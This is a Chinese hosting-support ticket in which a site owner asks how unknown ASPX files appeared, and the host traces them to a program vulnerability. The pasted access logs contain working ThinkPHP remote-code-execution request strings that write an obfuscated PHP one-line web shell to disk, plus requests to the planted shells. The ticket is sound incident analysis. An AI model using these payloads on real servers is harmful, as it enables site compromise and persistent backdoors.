问:麻烦帮忙查一下.heiyu/class.aspxheiyu/hei.ashx这2个文件是怎么出现的.是通过FTP上传的还是通过某个文件进行创建的?,麻烦帮忙查一下这个文件是怎么出现的是通过上传的还是通过某个文件
问:links.asp还有这4个文件.
答:您好,我们检查了,不是通过ftp进来的, 是您程序漏洞的方式。文件的创建时间基本和这些注入时间吻合(windows系统日志要加8才是北京时间),请及时联系程序方检查清理,并及时修补程序漏洞,网站访问日志存放在您空间,是17号入侵的,非常感谢您长期对我司的支持!
07:25:54 POST /heiyu/hei.ashx dir=Dick – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 http://www.bjwnht.com.cn/heiyu/hei.ashx?dir=Dick 200 456 339005:32:51 GET / s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=fkyot.php&content=%3C?php%20print(md;$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37 – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) http://www.bjwnht.com.cn/?s=index/\\think\\template\\driver\\file/write&cacheFile=fkyot.php&content=<?php print(md;$a=str_replace("vbnm","","");@$a($_POST[ysy]);?> 200 63913 1625 05:32:53 GET / s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=imbok.php&vars%5B1%5D%5B%5D=%3C?php%20print(md;$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37$ – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) http://www.bjwnht.com.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=imbok.php&vars[1][]=<?php print(md;$a=str_replace("vbnm","","");@$a($_POST[ysy]);?>ysydjsjxbei37$ 200 64085 1625 07:25:54 POST /heiyu/hei.ashx dir=Dick – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 http://www.bjwnht.com.cn/heiyu/hei.ashx?dir=Dick 200 456 3390
问:fukun.aspx 这个不是我们的文件. 应该是这个文件导致创建了下面的这些文件. 问题是 这个文件是2015年的?? 这个不太可能吧? 能不能查到这个文件是怎么来的.通过FTP的吗. 还是由什么文件创建的?
答:您好,这些文件都是5月14日建立的。但这个文件早在5月1日就有访问请求记录,我们查过了都不是通过ftp方式上传的,只能说明您网站被篡改以后一直没有清理干净,所以才会导致反复被挂马。现在最好的办法就是重新上传全新的程序,如果再次被挂马,可以再来检查分析入侵点,非常感谢您长期对我司的支持! 11:01:42 GET /heiyu/guanli/fukun.aspx u=Damo – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 – 200 1178 3265
问:感谢你. 已经清理. 我再观察一下
答:您好,好的,若还有其他需要,请及时联系反馈,非常感谢您长期对我司的支持!
